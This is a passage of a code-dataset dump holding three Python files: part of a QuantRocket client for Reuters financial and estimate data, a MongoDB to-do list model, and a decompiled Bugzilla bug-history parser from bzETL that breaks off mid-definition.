Possible choices: INC, BAL, CAS\n\n Returns\n -------\n dict\n codes and descriptions\n \"\"\"\n params = {}\n if codes:\n params[\"codes\"] = codes\n if report_types:\n params[\"report_types\"] = report_types\n if statement_types:\n params[\"statement_types\"] = statement_types\n response = houston.get(\"/fundamental/reuters/codes\", params=params)\n\n houston.raise_for_status_with_json(response)\n return response.json()\n\ndef _cli_list_reuters_codes(*args, **kwargs):\n return json_to_cli(list_reuters_codes, *args, **kwargs)\n\ndef download_reuters_financials(codes, filepath_or_buffer=None, output=\"csv\",\n start_date=None, end_date=None,\n universes=None, conids=None,\n exclude_universes=None, exclude_conids=None,\n interim=False, restatements=False, fields=None):\n \"\"\"\n Query financial statements from the Reuters financials database and\n download to file.\n\n You can query one or more COA codes. Use the `list_reuters_codes` function to see\n available codes.\n\n Annual or interim reports are available. 
Annual is the default and provides\n deeper history.\n\n By default restatements are excluded, but they can optionally be included.\n\n Parameters\n ----------\n codes : list of str, required\n the Chart of Account (COA) code(s) to query\n\n filepath_or_buffer : str or file-like object\n filepath to write the data to, or file-like object (defaults to stdout)\n\n output : str\n output format (json, csv, txt, default is csv)\n\n start_date : str (YYYY-MM-DD), optional\n limit to statements on or after this date (based on the\n fiscal period end date if including restatements, otherwise the\n filing date)\n\n end_date : str (YYYY-MM-DD), optional\n limit to statements on or before this date (based on the\n fiscal period end date if including restatements, otherwise the\n filing date)\n\n universes : list of str, optional\n limit to these universes\n\n conids : list of int, optional\n limit to these conids\n\n exclude_universes : list of str, optional\n exclude these universes\n\n exclude_conids : list of int, optional\n exclude these conids\n\n interim : bool, optional\n return interim reports (default is to return annual reports,\n which provide deeper history)\n\n restatements : bool, optional\n include restatements (default is to exclude them)\n\n fields : list of str, optional\n only return these fields (pass ['?'] or any invalid fieldname to see\n available fields)\n\n Returns\n -------\n None\n\n Examples\n --------\n Query total revenue (COA code RTLR) for a universe of Australian stocks. 
You can use\n StringIO to load the CSV into pandas.\n\n >>> f = io.StringIO()\n >>> download_reuters_financials([\"RTLR\"], f, universes=[\"asx-stk\"],\n start_date=\"2014-01-01\"\n end_date=\"2017-01-01\")\n >>> financials = pd.read_csv(f, parse_dates=[\"StatementDate\", \"SourceDate\", \"FiscalPeriodEndDate\"])\n\n Query net income (COA code NINC) from interim reports for two securities\n (identified by conid) and include restatements:\n\n >>> download_reuters_financials([\"NINC\"], f, conids=[123456, 234567],\n interim=True, restatements=True)\n\n Query common and preferred shares outstanding (COA codes QTCO and QTPO) and return a\n minimal set of fields (several required fields will always be returned):\n\n >>> download_reuters_financials([\"QTCO\", \"QTPO\"], f, universes=[\"nyse-stk\"],\n fields=[\"Amount\"])\n \"\"\"\n params = {}\n if codes:\n params[\"codes\"] = codes\n if start_date:\n params[\"start_date\"] = start_date\n if end_date:\n params[\"end_date\"] = end_date\n if universes:\n params[\"universes\"] = universes\n if conids:\n params[\"conids\"] = conids\n if exclude_universes:\n params[\"exclude_universes\"] = exclude_universes\n if exclude_conids:\n params[\"exclude_conids\"] = exclude_conids\n if interim:\n params[\"interim\"] = interim\n if restatements:\n params[\"restatements\"] = restatements\n if fields:\n params[\"fields\"] = fields\n\n output = output or \"csv\"\n\n if output not in (\"csv\", \"json\", \"txt\"):\n raise ValueError(\"Invalid ouput: {0}\".format(output))\n\n response = houston.get(\"/fundamental/reuters/financials.{0}\".format(output), params=params,\n timeout=60*5)\n\n houston.raise_for_status_with_json(response)\n\n filepath_or_buffer = filepath_or_buffer or sys.stdout\n\n write_response_to_filepath_or_buffer(filepath_or_buffer, response)\n\ndef _cli_download_reuters_financials(*args, **kwargs):\n return json_to_cli(download_reuters_financials, *args, **kwargs)\n\ndef download_reuters_estimates(codes, 
filepath_or_buffer=None, output=\"csv\",\n start_date=None, end_date=None,\n universes=None, conids=None,\n exclude_universes=None, exclude_conids=None,\n period_types=None, fields=None):\n \"\"\"\n Query estimates and actuals from the Reuters estimates database and\n download to file.\n\n You can query one or more indicator codes. Use the `list_reuters_codes`\n function to see available codes.\n\n Parameters\n ----------\n codes : list of str, required\n the indicator code(s) to query\n\n filepath_or_buffer : str or file-like object\n filepath to write the data to, or file-like object (defaults to stdout)\n\n output : str\n output format (json, csv, txt, default is csv)\n\n start_date : str (YYYY-MM-DD), optional\n limit to estimates and actuals on or after this fiscal period end date\n\n end_date : str (YYYY-MM-DD), optional\n limit to estimates and actuals on or before this fiscal period end date\n\n universes : list of str, optional\n limit to these universes\n\n conids : list of int, optional\n limit to these conids\n\n exclude_universes : list of str, optional\n exclude these universes\n\n exclude_conids : list of int, optional\n exclude these conids\n\n period_types : list of str, optional\n limit to these fiscal period types. Possible choices: A, Q, S, where\n A=Annual, Q=Quarterly, S=Semi-Annual\n\n fields : list of str, optional\n only return these fields (pass ['?'] or any invalid fieldname to see\n available fields)\n\n Returns\n -------\n None\n\n Examples\n --------\n Query EPS estimates and actuals for a universe of Australian stocks. 
You can use\n StringIO to load the CSV into pandas.\n\n >>> f = io.StringIO()\n >>> download_reuters_estimates([\"EPS\"], f, universes=[\"asx-stk\"],\n start_date=\"2014-01-01\"\n end_date=\"2017-01-01\")\n >>> estimates = pd.read_csv(f, parse_dates=[\"FiscalPeriodEndDate\", \"AnnounceDate\"])\n \"\"\"\n params = {}\n if codes:\n params[\"codes\"] = codes\n if start_date:\n params[\"start_date\"] = start_date\n if end_date:\n params[\"end_date\"] = end_date\n if universes:\n params[\"universes\"] = universes\n if conids:\n params[\"conids\"] = conids\n if exclude_universes:\n params[\"exclude_universes\"] = exclude_universes\n if exclude_conids:\n params[\"exclude_conids\"] = exclude_conids\n if period_types:\n params[\"period_types\"] = period_types\n if fields:\n params[\"fields\"] = fields\n\n output = output or \"csv\"\n\n if output not in (\"csv\", \"json\", \"txt\"):\n raise ValueError(\"Invalid ouput: {0}\".format(output))\n\n response = houston.get(\"/fundamental/reuters/estimates.{0}\".format(output), params=params,\n timeout=60*5)\n\n houston.raise_for_status_with_json(response)\n\n filepath_or_buffer = filepath_or_buffer or sys.stdout\n\n write_response_to_filepath_or_buffer(filepath_or_buffer, response)\n\ndef _cli_download_reuters_estimates(*args, **kwargs):\n return json_to_cli(download_reuters_estimates, *args, **kwargs)\n","sub_path":"quantrocket/fundamental.py","file_name":"fundamental.py","file_ext":"py","file_size_in_byte":11681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"324777488","text":"from app import db\n\n\nclass TodoList(db.Document):\n name = db.StringField()\n\n def json(self):\n items = [\n item.json()\n for item in TodoItem.query.filter(TodoItem.todo_list.mongo_id == self.mongo_id).all()\n ]\n return {\n \"mongo_id\": str(self.mongo_id),\n \"name\": self.name,\n \"items\": items,\n }\n\n\nclass TodoItem(db.Document):\n text = db.StringField()\n todo_list = 
db.DocumentField(TodoList)\n due = db.DateTimeField()\n finished = db.BoolField()\n\n def json(self):\n return {\n \"mongo_id\": str(self.mongo_id),\n \"list_mongo_id\": str(self.todo_list.mongo_id),\n \"text\": self.text,\n \"due\": self.due,\n \"finished\": self.finished,\n }\n","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"497459952","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\bzETL\\parse_bug_history.py\n# Compiled at: 2013-12-18 17:03:15\nimport re, math\nfrom bzETL.util import struct, strings\nfrom bzETL.util.struct import nvl\nfrom bzETL.util.multiset import Multiset\nfrom transform_bugzilla import normalize, NUMERIC_FIELDS, MULTI_FIELDS\nfrom bzETL.util.cnv import CNV\nfrom bzETL.util.logs import Log\nfrom bzETL.util.queries import Q\nfrom bzETL.util.struct import Struct, Null\nfrom bzETL.util.files import File\nfrom bzETL.util.maths import Math\nFLAG_PATTERN = re.compile('^(.*)([?+-])(\\\\([^)]*\\\\))?$')\nDEBUG_CHANGES = False\nDEBUG_STATUS = False\nTRUNC_FIELDS = [\n 'cc', 'blocked', 'dependson', 'keywords']\nKNOWN_MISSING_KEYWORDS = {\n 'dogfood', 'beta1', 'nsbeta1', 'nsbeta2', 'nsbeta3', 'patch', 'mozilla1.0', 'correctness',\n 'mozilla0.9', 'mozilla0.9.9+', 'nscatfood', 'mozilla0.9.3', 'fcc508', 'nsbeta1+', 'mostfreq'}\nSTOP_BUG = 999999999\nMAX_TIME = 9999999999000\n\nclass BugHistoryParser:\n\n def __init__(self, settings, output_queue):\n self.aliases = Null\n self.startNewBug(struct.wrap({'bug_id': 0, 'modified_ts': 0, '_merge_order': 1}))\n self.prevActivityID = Null\n self.prev_row = Null\n self.settings = settings\n self.output = output_queue\n self.initializeAliases()\n\n def processRow(self, row_in):\n if len(row_in.items()) == 0:\n return\n 
else:\n try:\n try:\n self.currBugID = row_in.bug_id\n if self.settings.debug:\n Log.note('process row: {{row}}', {'row': row_in})\n if self.prevBugID < self.currBugID:\n if self.prevBugID > 0:\n if DEBUG_STATUS:\n Log.note('Emitting intermediate versions for {{bug_id}}', {'bug_id': self.prevBugID})\n self.populateIntermediateVersionObjects()\n if row_in.bug_id == STOP_BUG:\n return\n self.startNewBug(row_in)\n if row_in.field_name in TRUNC_FIELDS:\n added = CNV.value2string(row_in.new_value)\n removed = CNV.value2string(row_in.old_value)\n uncertain = False\n if added in ('? ?', '?'):\n uncertain = True\n Log.note('PROBLEM Encountered uncertain added value. Skipping.')\n row_in.new_value = Null\n elif added != None and added.startswith('? '):\n uncertain = True\n row_in.new_value = added[2:]\n if removed in ('? ?', '?'):\n uncertain = True\n Log.note('PROBLEM Encountered uncertain removed value. Skipping.')\n row_in.old_value = Null\n elif removed != None and removed.startswith('? '):\n uncertain = True\n row_in.old_value = removed[2:]\n if uncertain and self.currBugState.uncertain == None:\n Log.note('PROBLEM Setting this bug to be uncertain.')\n self.processBugsActivitiesTableItem(struct.wrap({'modified_ts': row_in.modified_ts, \n 'modified_by': row_in.modified_by, \n 'field_name': 'uncertain', \n 'new_value': Null, \n 'old_value': '1', \n 'attach_id': Null}))\n if row_in.new_value == None and row_in.old_value == None:\n Log.note('Nothing added or removed. 
Skipping update.')\n return\n new_value = CNV.value2int(row_in.new_value) if row_in.field_name.endswith('_ts') else row_in.new_value\n if row_in._merge_order == 1:\n self.processSingleValueTableItem(row_in.field_name, new_value)\n elif row_in._merge_order == 2:\n self.processMultiValueTableItem(row_in.field_name, new_value)\n elif row_in._merge_order == 7:\n self.processAttachmentsTableItem(row_in)\n elif row_in._merge_order == 8:\n self.processFlagsTableItem(row_in)\n elif row_in._merge_order == 9:\n self.processBugsActivitiesTableItem(row_in)\n else:\n Log.warning(\"Unhandled merge_order: '\" + row_in._merge_order + \"'\")\n except Exception as e:\n Log.warning('Problem processing row: {{row}}', {'row': row_in}, e)\n\n finally:\n if row_in._merge_order > 1 and self.currBugState.created_ts == None:\n Log.note('PROBLEM expecting a created_ts (did you install the timezone database into your MySQL instance?)')\n for b in self.currBugState.blocked:\n if isinstance(b, basestring):\n Log.note('PROBLEM error')\n\n self.prev_row = row_in\n\n return\n\n @staticmethod\n def uid(bug_id, modified_ts):\n if modified_ts == None:\n Log.error('modified_ts can not be Null')\n return unicode(bug_id) + '_' + unicode(modified_ts)[0:-3]\n\n def startNewBug(self, row_in):\n self.prevBugID = row_in.bug_id\n self.bugVersions = []\n self.bugVersionsMap = Struct()\n self.currActivity = Struct()\n self.currBugAttachmentsMap = Struct()\n self.currBugState = Struct(_id=BugHistoryParser.uid(row_in.bug_id, row_in.modified_ts), bug_id=row_in.bug_id, modified_ts=row_in.modified_ts, modified_by=row_in.modified_by, reported_by=row_in.modified_by, attachments=[])\n for f in MULTI_FIELDS:\n self.currBugState[f] = set([])\n\n self.currBugState.flags = []\n if row_in._merge_order != 1:\n Log.warning('Current bugs table record not found for bug_id: {{bug_id}} (merge order should have been 1, but was {{start_time}})', row_in)\n\n def processSingleValueTableItem(self, field_name, new_value):\n 
self.currBugState[field_name] = new_value\n\n def processMultiValueTableItem(self, field_name, new_value):\n if field_name in NUMERIC_FIELDS:\n new_value = int(new_value)\n try:\n self.currBugState[field_name].add(new_value)\n return Null\n except Exception as e:\n Log.warning('Unable to push {{value}} to array field {{start_time}} on bug {{curr_value}} current value: {{curr_value}}', {'value': new_value, \n 'field': field_name, \n 'bug_id': self.currBugID, \n 'curr_value': self.currBugState[field_name]}, e)\n\n def processAttachmentsTableItem(self, row_in):\n currActivityID = BugHistoryParser.uid(self.currBugID, row_in.modified_ts)\n if currActivityID != self.prevActivityID:\n self.prevActivityID = currActivityID\n self.currActivity = Struct(_id=currActivityID, modified_ts=row_in.modified_ts, modified_by=row_in.modified_by, changes=[\n {'field_name': 'attachment_added', \n 'attach_id': row_in.attach_id}])\n self.bugVersions.append(self.currActivity)\n self.bugVersionsMap[currActivityID] = self.currActivity\n att = self.currBugAttachmentsMap[unicode(row_in.attach_id)]\n if att == None:\n att = {'attach_id': row_in.attach_id, 'modified_ts': row_in.modified_ts, \n 'created_ts': row_in.created_ts, \n 'modified_by': row_in.modified_by, \n 'flags': []}\n self.currBugAttachmentsMap[unicode(row_in.attach_id)] = att\n att['created_ts'] = Math.min([row_in.modified_ts, att['created_ts']])\n if row_in.field_name == 'created_ts' and row_in.new_value == None:\n pass\n else:\n att[row_in.field_name] = row_in.new_value\n return\n\n def processFlagsTableItem(self, row_in):\n flag = self.makeFlag(row_in.new_value, row_in.modified_ts, row_in.modified_by)\n if row_in.attach_id != None:\n if self.currBugAttachmentsMap[unicode(row_in.attach_id)] == None:\n Log.note('Unable to find attachment {{attach_id}} for bug_id {{bug_id}}', {'attach_id': row_in.attach_id, \n 'bug_id': self.currBugID})\n else:\n if self.currBugAttachmentsMap[unicode(row_in.attach_id)].flags == None:\n 
Log.error('should never happen')\n self.currBugAttachmentsMap[unicode(row_in.attach_id)].flags.append(flag)\n else:\n self.currBugState.flags.append(flag)\n return\n\n def processBugsActivitiesTableItem(self, row_in):\n if self.currBugState.created_ts == None:\n Log.error('must have created_ts')\n if row_in.field_name == 'flagtypes_name':\n row_in.field_name = 'flags'\n multi_field_new_value = self.getMultiFieldValue(row_in.field_name, row_in.new_value)\n multi_field_old_value = self.getMultiFieldValue(row_in.field_name, row_in.old_value)\n currActivityID = BugHistoryParser.uid(self.currBugID, row_in.modified_ts)\n if currActivityID != self.prevActivityID:\n self.currActivity = self.bugVersionsMap[currActivityID]\n if self.currActivity == None:\n self.currActivity = Struct(_id=currActivityID, modified_ts=row_in.modified_ts, modified_by=row_in.modified_by, changes=[])\n self.bugVersions.append(self.currActivity)\n self.prevActivityID = currActivityID\n if row_in.attach_id != None:\n attachment = self.currBugAttachmentsMap[unicode(row_in.attach_id)]\n if attachment == None:\n Log.note('PROBLEM Unable to find attachment {{attach_id}} for bug_id {{start_time}}: {{start_time}}', {'attach_id': row_in.attach_id, \n 'bug_id': self.currBugID, \n 'attachments': self.currBugAttachmentsMap})\n self.currActivity.changes.append({'field_name': row_in.field_name, \n 'new_value': row_in.new_value, \n 'old_value': row_in.old_value, \n 'attach_id': row_in.attach_id})\n elif row_in.field_name in MULTI_FIELDS:\n total = attachment[row_in.field_name]\n total = self.removeValues(total, multi_field_new_value, 'added', row_in.field_name, 'attachment', attachment, row_in.modified_ts)\n total = self.addValues(total, multi_field_old_value, 'removed attachment', row_in.field_name, attachment)\n attachment[row_in.field_name] = total\n else:\n attachment[row_in.field_name] = row_in.old_value\n self.currActivity.changes.append({'field_name': row_in.field_name, \n 'new_value': row_in.new_value, \n 
'old_value': row_in.old_value, \n 'attach_id': row_in.attach_id})\n elif row_in.field_name in MULTI_FIELDS:\n total = self.currBugState[row_in.field_name]\n total = self.removeValues(total, multi_field_new_value, 'added', row_in.field_name, 'currBugState', self.currBugState, row_in.modified_ts)\n total = self.addValues(total, multi_field_old_value, 'removed bug', row_in.field_name, self.currBugState)\n self.currBugState[row_in.field_name] = total\n else:\n self.currBugState[row_in.field_name] = row_in.old_value\n self.currActivity.changes.append({'field_name': row_in.field_name, \n 'new_value': row_in.new_value, \n 'old_value': row_in.old_value, \n 'attach_id': row_in.attach_id})\n return\n\n def populateIntermediateVersionObjects(self):\n self.bugVersions = Q.sort(self.bugVersions, [{'field': 'modified_ts', 'sort': -1}])\n prevValues = {}\n currVersion = Null\n nextVersion = Struct(_id=self.currBugState._id, changes=[])\n flagMap = {}\n self.bug_version_num = 1\n while self.bugVersions or nextVersion != None:\n try:\n currVersion = nextVersion\n if self.bugVersions:\n try:\n nextVersion = self.bugVersions.pop()\n except Exception as e:\n Log.error('problem', e)\n\n else:\n nextVersion = Null\n if DEBUG_STATUS:\n Log.note('Populating JSON for version {{id}}', {'id': currVersion._id})\n mergeBugVersion = False\n if nextVersion != None and currVersion._id == nextVersion._id:\n if DEBUG_STATUS:\n Log.note('Merge mode: activated ' + self.currBugState._id)\n mergeBugVersion = True\n if nextVersion != None:\n if DEBUG_STATUS:\n Log.note('We have a nextVersion: {{timestamp}} (ver {{next_version}})', {'timestamp': nextVersion.modified_ts, \n 'next_version': self.bug_version_num + 1})\n self.currBugState.expires_on = nextVersion.modified_ts\n else:\n if DEBUG_STATUS:\n Log.note('Last bug_version_num = {{version}}', {'version': self.bug_version_num})\n self.currBugState.expires_on = MAX_TIME\n for propName, propValue in currVersion.items():\n self.currBugState[propName] = 
propValue\n\n changes = Q.sort(currVersion.changes, ['attach_id', 'field_name', {'field': 'old_value', 'sort': -1}, 'new_value'])\n currVersion.changes = changes\n self.currBugState.changes = changes\n for c, change in enumerate(changes):\n if c + 1 < len(changes):\n next = changes[(c + 1)]\n if change.attach_id == next.attach_id and change.field_name == next.field_name and change.old_value != None and next.old_value == None:\n next.old_value = change.old_value\n changes[c] = Null\n continue\n if change.new_value == None and change.old_value == None and change.field_name != 'attachment_added':\n changes[c] = Null\n continue\n if DEBUG_CHANGES:\n 'Processing change: ' + CNV.object2JSON(change)\n target = self.currBugState\n targetName = 'currBugState'\n attach_id = change.attach_id\n if attach_id != None:\n if change.field_name == 'attachment_added':\n att = self.currBugAttachmentsMap[unicode(attach_id)]\n self.currBugState.attachments.append(att)\n continue\n else:\n target = self.currBugAttachmentsMap[unicode(attach_id)]\n targetName = 'attachment'\n if target == None:\n Log.warning('Encountered a change to missing attachment for bug {{bug_id}}: {{change}}', {'bug_id': self.currBugState['bug_id'], \n 'change': change})\n target = self.currBugState\n targetName = 'currBugState'\n if change.field_name == 'flags':\n self.processFlagChange(target, change, currVersion.modified_ts, currVersion.modified_by)\n elif change.field_name in MULTI_FIELDS:\n a = target[change.field_name]\n multi_field_value = BugHistoryParser.getMultiFieldValue(change.field_name, change.new_value)\n multi_field_value_removed = BugHistoryParser.getMultiFieldValue(change.field_name, change.old_value)\n a = self.removeValues(a, multi_field_value_removed, 'removed', change.field_name, targetName, target, currVersion.modified_ts)\n a = self.addValues(a, multi_field_value, 'added', change.field_name, target)\n target[change.field_name] = a\n else:\n if target[change.field_name] != change.new_value:\n 
self.setPrevious(target, change.field_name, target[change.field_name], currVersion.modified_ts)\n target[change.field_name] = change.new_value\n\n self.currBugState.bug_version_num = self.bug_version_num\n if not mergeBugVersion:\n self.bug_version_num += 1\n if self.currBugState.expires_on >= self.settings.start_time:\n state = normalize(self.currBugState)\n if state.blocked != None and len(state.blocked) == 1 and 'Null' in state.blocked:\n Log.note(\"ERROR: state.blocked has 'Null'! Programming error!\")\n if DEBUG_STATUS:\n Log.note('Bug {{bug_state.bug_id}} v{{bug_state.bug_version_num}} (id = {{bug_state.id}})', {'bug_state': state})\n self.output.add({'id': state.id, 'value': state})\n elif DEBUG_STATUS:\n Log.note('Not outputting {{_id}} - it is before self.start_time ({{start_time|datetime}})', {'_id': self.currBugState._id, \n 'start_time': self.settings.start_time})\n elif DEBUG_STATUS:\n Log.note('Merging a change with the same timestamp = {{bug_state._id}}: {{bug_state}}', {'bug_state': currVersion})\n finally:\n if self.currBugState.blocked == None:\n Log.note('expecting a created_ts')\n\n return\n\n def findFlag(self, flag_list, flag):\n for f in flag_list:\n if f.value == flag.value:\n return f\n if f.request_type == flag.request_type and f.request_status == flag.request_status and self.alias(f.requestee) == self.alias(flag.requestee):\n Log.note(\"Using bzAliases to match change '\" + flag.value + \"' to '\" + f.value + \"'\")\n return f\n\n return Null\n\n def processFlagChange(self, target, change, modified_ts, modified_by, reverse=False):\n if target.flags == None:\n Log.note(\"PROBLEM processFlagChange called with unset 'flags'\")\n target.flags = []\n addedFlags = BugHistoryParser.getMultiFieldValue('flags', change.new_value)\n removedFlags = BugHistoryParser.getMultiFieldValue('flags', change.old_value)\n if reverse:\n addedFlags, removedFlags = removedFlags, addedFlags\n for flagStr in removedFlags:\n if flagStr == '':\n continue\n 
removed_flag = BugHistoryParser.makeFlag(flagStr, modified_ts, modified_by)\n existingFlag = self.findFlag(target.flags, removed_flag)\n if existingFlag != None:\n existingFlag['previous_modified_ts'] = existingFlag['modified_ts']\n existingFlag['modified_ts'] = modified_ts\n if existingFlag['modified_by'] != modified_by:\n existingFlag['previous_modified_by'] = existingFlag['modified_by']\n existingFlag['modified_by'] = modified_by\n existingFlag['previous_status'] = removed_flag['request_status']\n existingFlag['request_status'] = 'd'\n existingFlag['previous_value'] = flagStr\n existingFlag['value'] = Null\n duration_ms = existingFlag['modified_ts'] - existingFlag['previous_modified_ts']\n existingFlag['duration_days'] = math.floor(duration_ms / 86400000.0)\n else:\n Log.warning('Did not find a corresponding flag for removed value {{removed}} in {{existing}}', {'removed': flagStr, \n 'existing': target.flags})\n\n for flagStr in addedFlags:\n if flagStr == '':\n continue\n added_flag = self.makeFlag(flagStr, modified_ts, modified_by)\n candidates = [ element for element in target.flags if element['value'] == None and added_flag['request_type'] == element['request_type'] and added_flag['request_status'] != element['previous_status']\n ]\n if not candidates:\n target.flags.append(added_flag)\n continue\n chosen_one = candidates[0]\n if len(candidates) > 1:\n if DEBUG_STATUS:\n Log.note('Matched added flag {{flag}} to multiple removed flags {{candidates}}. 
Using the best.', {'flag': added_flag, \n 'candidates': candidates})\n matched_ts = [ element for element in candidates if added_flag.modified_ts == element.modified_ts\n ]\n if len(matched_ts) == 1:\n Log.note('Matching on modified_ts fixed it')\n chosen_one = matched_ts[0]\n else:\n Log.note('Matching on modified_ts left us with {{num}} matches', {'num': len(matched_ts)})\n matched_req = [ element for element in candidates if element['requestee'] != None and added_flag['modified_by'].lower() == element['requestee'].lower()\n ]\n if len(matched_req) == 1:\n Log.note('Matching on requestee fixed it')\n chosen_one = matched_req[0]\n else:\n Log.warning('Matching on requestee left us with {{num}} matches. Skipping match.', {'num': len(matched_req)})\n chosen_one = Null\n elif DEBUG_STATUS:\n Log.note('Matched added flag {{added}} to removed flag {{removed}}', {'added': added_flag, \n 'removed': chosen_one})\n if chosen_one != None:\n for f in ['value', 'request_status', 'requestee']:\n chosen_one[f] = nvl(added_flag[f], chosen_one[f])\n\n return\n\n def setPrevious(self, dest, aFieldName, aValue, aChangeAway):\n if dest['previous_values'] == None:\n dest['previous_values'] = {}\n pv = dest['previous_values']\n vField = aFieldName + '_value'\n caField = aFieldName + '_change_away_ts'\n ctField = aFieldName + '_change_to_ts'\n ddField = aFieldName + '_duration_days'\n pv[vField] = aValue\n if pv[caField] != None:\n pv[ctField] = pv[caField]\n else:\n pv[ctField] = dest['created_ts']\n pv[caField] = aChangeAway\n try:\n duration_ms = pv[caField] - pv[ctField]\n except Exception as e:\n Log.error('', e)\n\n pv[ddField] = math.floor(duration_ms / 86400000.0)\n return\n\n @staticmethod\n def makeFlag(flag, modified_ts, modified_by):\n flagParts = Struct(modified_ts=modified_ts, modified_by=modified_by, value=flag)\n matches = FLAG_PATTERN.match(flag)\n if matches:\n flagParts.request_type = matches.group(1)\n flagParts.request_status = matches.group(2)\n if 
matches.start(3) != -1 and len(matches.group(3)) > 2:\n flagParts.requestee = matches.group(3)[1:-1]\n return flagParts\n\n def addValues(self, total, add, valueType, field_name, target):\n if not add:\n return total\n else:\n if field_name == 'flags':\n for v in add:\n total.append(BugHistoryParser.makeFlag(v, target.modified_ts, target.modified_by))\n\n if valueType != 'added':\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': Null, \n 'old_value': (', ').join(Q.sort(add)), \n 'attach_id': target.attach_id})\n else:\n Log.error('programming error')\n return total\n diff = add - total\n removed = total & add\n if removed:\n Log.note('PROBLEM: Found {{type}}({{bug_id}}).{{field_name}} value: (Removing {{removed}} can not result in {{existing}})', {'bug_id': target.bug_id, \n 'type': valueType, \n 'field_name': field_name, \n 'removed': removed, \n 'existing': target[field_name]})\n if valueType != 'added' and diff:\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': Null, \n 'old_value': (', ').join(map(unicode, Q.sort(diff))), \n 'attach_id': target.attach_id})\n return total | add\n\n def removeValues(self, total, remove, valueType, field_name, arrayDesc, target, timestamp):\n if field_name == 'flags':\n removeMe = []\n for v in remove:\n flag = BugHistoryParser.makeFlag(v, 0, 0)\n found = self.findFlag(total, flag)\n if found != None:\n removeMe.append(found.value)\n else:\n Log.note('PROBLEM Unable to find {{type}} FLAG: {{object}}.{{field_name}}: (All {{missing}}' + ' not in : {{existing}})', {'type': valueType, \n 'object': arrayDesc, \n 'field_name': field_name, \n 'missing': v, \n 'existing': total})\n\n total = [ a for a in total if a.value not in removeMe ]\n if valueType == 'added' and removeMe:\n try:\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': (', ').join(Q.sort(removeMe)), \n 'old_value': Null, \n 'attach_id': target.attach_id})\n except Exception as email:\n 
Log.error('problem', email)\n\n return total\n if field_name == 'keywords':\n diff = remove - total\n output = total - remove\n if valueType == 'added' and remove:\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': (', ').join(map(unicode, Q.sort(remove))), \n 'old_value': Null, \n 'attach_id': target.attach_id})\n if diff - KNOWN_MISSING_KEYWORDS:\n Log.note('PROBLEM Unable to find {{type}} KEYWORD {{object}}({{bug_id}}) (adding anyway): (All {{missing}}' + ' not in : {{existing}})', {'bug_id': target.bug_id, \n 'type': valueType, \n 'object': arrayDesc, \n 'field_name': field_name, \n 'missing': diff, \n 'existing': total})\n for d in diff:\n KNOWN_MISSING_KEYWORDS.add(d)\n\n return output\n if field_name == 'cc':\n map_total = struct.inverse({t:self.alias(t) for t in total})\n map_remove = struct.inverse({r:self.alias(r) for r in remove})\n c_total = set(map_total.keys())\n c_remove = set(map_remove.keys())\n removed = c_total & c_remove\n diff = c_remove - c_total\n output = c_total - c_remove\n if not target.uncertain:\n if diff:\n Log.note('PROBLEM: Unable to find CC:\\n{{missing|indent}}\\nnot in:\\n{{existing|indent}}\\nalias info:\\n{{candidates|indent}}', {'type': valueType, \n 'object': arrayDesc, \n 'field_name': field_name, \n 'missing': Q.sort(Q.map(diff, map_remove)), \n 'existing': Q.sort(total), \n 'candidates': {d:self.aliases.get(d, None) for d in diff}})\n else:\n for lost in diff:\n best_score = 0.3\n best = Null\n for found in output:\n score = Math.min([\n strings.edit_distance(found, lost),\n strings.edit_distance(found.split('@')[0], lost.split('@')[0]),\n strings.edit_distance(map_total[found][0], lost),\n strings.edit_distance(map_total[found][0].split('@')[0], lost.split('@')[0])])\n if score < best_score:\n best = found\n\n if best != Null:\n Log.note('UNCERTAIN ALIAS FOUND: {{lost}} == {{found}}', {'lost': lost, \n 'found': best})\n removed.add(best)\n output.discard(best)\n else:\n Log.note('PROBLEM Unable 
to pattern match {{type}} value: {{object}}.{{field_name}}: ({{missing}}' + ' not in : {{existing}})', {'type': valueType, \n 'object': arrayDesc, \n 'field_name': field_name, \n 'missing': lost, \n 'existing': total})\n\n if valueType == 'added':\n try:\n if removed - set(map_total.keys()):\n Log.error('problem with alias finding:\\n' + 'map_total={{map_total}}\\n' + 'map_remove={{map_remove}}\\n' + 'c_total={{c_total}}\\n' + 'c_remove={{c_remove}}\\n' + 'removed={{removed}}\\n' + 'diff={{diff}}\\n' + 'output={{output}}\\n', {'map_total': map_total, \n 'c_total': c_total, \n 'map_remove': map_remove, \n 'c_remove': c_remove, \n 'removed': removed, \n 'diff': diff, \n 'output': output})\n final_removed = Q.map(removed, map_total)\n if final_removed:\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': (', ').join(map(unicode, Q.sort(final_removed))), \n 'old_value': Null, \n 'attach_id': target.attach_id})\n except Exception as email:\n Log.error('issues', email)\n\n return Q.map(output, map_total)\n else:\n removed = total & remove\n diff = remove - total\n output = total - remove\n if valueType == 'added' and removed:\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': (', ').join(map(unicode, Q.sort(removed))), \n 'old_value': Null, \n 'attach_id': target.attach_id})\n if diff:\n Log.note('PROBLEM Unable to find {{type}} value in {{bug_id}}: {{object}}.{{field_name}}: (All {{missing}}' + ' not in : {{existing}})', {'bug_id': target.bug_id, \n 'type': valueType, \n 'object': arrayDesc, \n 'field_name': field_name, \n 'missing': diff, \n 'existing': total})\n return output\n return\n\n @staticmethod\n def getMultiFieldValue(name, value):\n if value == None:\n return set()\n else:\n if name in MULTI_FIELDS:\n if name in NUMERIC_FIELDS:\n return set([ int(s.strip()) for s in value.split(',') if s.strip() != '' ])\n return set([ s.strip() for s in value.split(',') if s.strip() != '' ])\n return {value}\n\n def 
